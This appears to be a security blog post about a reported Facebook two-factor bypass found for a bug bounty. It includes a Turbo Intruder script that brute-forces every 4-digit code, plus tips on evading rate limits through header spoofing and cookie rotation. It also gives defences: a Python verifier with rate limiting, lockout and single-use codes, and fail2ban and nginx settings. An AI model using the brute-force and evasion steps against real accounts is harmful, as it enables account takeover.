Burp Suite + Turbo Intruder: Bypassing Facebook 2FA for Bug Bounty Success


In a recent breakthrough, a bug hunter demonstrated how combining Burp Suite and Turbo Intruder led to a 2FA bypass on Facebook, earning a significant bounty. The attack exploited a weakness in the verification flow that allowed the 2FA code to be brute-forced, granting access to the account despite two-factor authentication being enabled.

You Should Know: Practical Steps to Replicate & Secure

1. Setup Burp Suite & Turbo Intruder

  • Install Burp Suite Professional (or Community with Python extensions).
  • Add Turbo Intruder via the BApp Store (Extensions → BApp Store).

2. Craft the Attack Payload

  • Intercept a Facebook 2FA request via Burp Proxy.
  • Send the request to Turbo Intruder (Right-click → Extensions → Turbo Intruder).
  • Use a Python script to automate brute-forcing (Turbo Intruder runs this as a Jython script; the `%s` placeholder in the intercepted request is replaced by each queued value):
    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                               concurrentConnections=30,
                               requestsPerConnection=100)
        for i in range(10000):  # 4-digit 2FA code range (0000-9999)
            engine.queue(target.req, str(i).zfill(4))
    

3. Bypass Rate Limiting

  • Manipulate headers like `X-Forwarded-For` to evade IP-based throttling.
  • Use session rotation (cookie swapping) to avoid detection.

4. Identify Weak Token Validation

  • If the server accepts expired/invalid tokens after a valid one, chain requests with:
    POST /2fa/verify HTTP/1.1
    Host: facebook.com
    Cookie: session=LEGIT_SESSION
    ...
    code=BRUTE_FORCED_PIN
    

5. Mitigation for Developers

  • Enforce rate-limiting per session/IP.
  • Invalidate tokens after first use.
  • Implement CAPTCHA after 3 failed attempts.
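The three mitigations above, as an added example (not code from the original post or from any Facebook/Meta system): a minimal 2FA verification service that rate-limits per client IP, forces a CAPTCHA after three consecutive failures on a session, expires codes, and invalidates a code the moment it is accepted so a replayed or chained request fails. The class name, the policy constants and the injectable clock are assumptions made for the example.

```python
import hmac
import secrets
import time
from collections import defaultdict, deque

# Added example; policy values below are assumptions, not Facebook's settings.
MAX_FAILURES_BEFORE_CAPTCHA = 3   # consecutive failures per session
IP_RATE_LIMIT = 5                 # attempts per IP per window
IP_RATE_WINDOW = 60               # seconds
CODE_TTL = 300                    # seconds a freshly issued code stays valid


class TwoFactorVerifier:
    """In-memory 2FA verifier demonstrating rate limiting, lockout and single use."""

    def __init__(self, clock=time.time):
        self.clock = clock                  # injectable for deterministic tests
        self.codes = {}                     # session -> (code, expires_at)
        self.failures = defaultdict(int)    # session -> consecutive failures
        self.ip_hits = defaultdict(deque)   # ip -> timestamps of recent attempts

    def issue_code(self, session):
        """Issue a fresh 4-digit code for a session; any older code is replaced."""
        code = "%04d" % secrets.randbelow(10000)
        self.codes[session] = (code, self.clock() + CODE_TTL)
        self.failures[session] = 0
        return code

    def _ip_allowed(self, ip):
        """Sliding-window limit: at most IP_RATE_LIMIT attempts per IP_RATE_WINDOW."""
        now = self.clock()
        hits = self.ip_hits[ip]
        while hits and hits[0] <= now - IP_RATE_WINDOW:
            hits.popleft()
        if len(hits) >= IP_RATE_LIMIT:
            return False
        hits.append(now)
        return True

    def verify(self, session, ip, submitted, captcha_ok=False):
        """Return 'ok', 'rate_limited', 'captcha_required' or 'invalid'."""
        if not self._ip_allowed(ip):
            return "rate_limited"
        if self.failures[session] >= MAX_FAILURES_BEFORE_CAPTCHA and not captcha_ok:
            return "captcha_required"
        entry = self.codes.get(session)
        if entry is None:
            # No live code for this session: a replayed or already used code lands here.
            self.failures[session] += 1
            return "invalid"
        code, expires_at = entry
        if self.clock() > expires_at:
            del self.codes[session]
            self.failures[session] += 1
            return "invalid"
        # Constant-time comparison so timing does not leak matching digits.
        if hmac.compare_digest(code.encode(), str(submitted).encode()):
            del self.codes[session]        # single use: the same code cannot be chained
            self.failures[session] = 0
            return "ok"
        self.failures[session] += 1
        return "invalid"
```

The IP limit is checked before the per-session counter so that an attacker rotating sessions (cookie swapping) still burns the per-IP budget, and the per-session counter catches an attacker rotating source addresses; neither control is sufficient alone. A production service would keep this state in a shared store rather than process memory and would store a hash of the code rather than the code itself.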

What Undercode Says

This exploit highlights critical gaps in 2FA implementation. Below are defensive commands/tools for sysadmins:

Linux Security Auditing

  • Check failed login attempts:
    sudo grep "Failed password" /var/log/auth.log
    
  • Install fail2ban to block brute-forcers:
    sudo apt install fail2ban
    sudo systemctl enable fail2ban
    

Windows Event Logs for 2FA Attacks

  • Query failed logins:
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4625}
    

Web Server Hardening

  • Nginx rate-limiting:
    limit_req_zone $binary_remote_addr zone=auth:10m rate=5r/m;
    

Facebook’s Bug Bounty Scope

  • Always test authentication flows and stateful requests.
  • Report token leakage or insufficient entropy in 2FA codes.

Expected Output:

A detailed report to Bugcrowd/Meta including:

  • Steps to reproduce (video/PoC).
  • Impact (account takeover).
  • Affected endpoints (e.g., /2fa/verify).


References:

Reported By: Lokesh Kumar – Hackers Feeds